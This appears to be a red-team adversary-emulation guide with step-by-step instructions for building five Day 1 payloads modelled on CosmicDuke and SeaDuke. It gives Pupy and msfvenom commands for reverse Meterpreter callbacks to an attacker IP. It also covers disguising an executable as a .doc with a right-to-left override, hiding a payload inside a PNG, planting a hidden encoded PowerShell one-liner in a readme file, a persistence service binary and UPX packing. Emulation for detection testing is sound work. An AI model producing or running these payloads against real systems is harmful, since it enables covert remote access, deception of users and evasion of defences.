#
Payload configs
In
#
Create Day 1 Payloads
#
1. CosmicDuke Payload (cod.3aka3.scr)
- Generate a Pupy-EC4 callback payload:
gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host <attacker IP>:1234
On Windows attack platform, rename cod.3aka3.scr with right-to-left override character (https://redcanary.com/blog/right-to-left-override/)
- Windows key and type 'Character Map'; select open
- Scroll to the RTLO character (U+202E)
- Select the RTLO character, then click "select", then click "copy"
- Right click
cod.3aka3.scr
, then click "Rename" - Move cursor to beginning of filename. Press "ctrl-v" to paste RTLO character, and hit "enter" to save the rename.
- The file should now be named "rcs.3aka3.doc"
Screenshot taken from: https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/
#
2. Privilege Escalation Payload (monkey.png)
Steps to re-create:
- Generate a PowerShell-formatted Meterpreter payload:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 --format psh -o meterpreter.ps1
- Transfer meterpreter.ps1 to Windows attack platform; embed meterpreter.ps1 into a PNG file using Invoke-PSImage (https://github.com/peewpw/Invoke-PSImage):
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\meterpreter.ps1 -Out .\monkey.png -Image .\monkey.jpg
#
3. Startup Folder Payload (strings64/hostui.exe)
- Generate PowerShell-formatted Meterpreter:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 --format psh-cmd
- Copy the PowerShell 1-liner to clipboard. Your clipboard should look like:
powershell.exe -nop -w hidden -e aQBmAc...base64 string...KAOwa=
Do not copy the execution preamble (%COMSPEC% /b /c start /b /min
)
- Open
payloads/readme.txt
; paste the PowerShell-Meterpreter blog on line816
. This line should look like:
$javasvc = "powershell.exe -nop -w hidden -e aQBmAc...base64 string...KAOwa="
#
4. Persistent Service Payload (javamtsup.exe)
- Generate a Meterpreter service-binary:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 -f exe-service -o javamtsup.exe
#
5. SeaDuke Payload (python.exe)
- Generate python-formatted Meterpreter:
msfvenom -p python/meterpreter/reverse_https LHOST=<attacker IP> LPORT=8443 -o python.py
Transfer python.py to Windows attack platform
Compile python.py into a portable executable using PyInstaller (https://pypi.org/project/PyInstaller/)
pyinstaller -F python.py
- Pack the python.exe payload using UPX (https://github.com/upx/upx)
upx --brute python.exe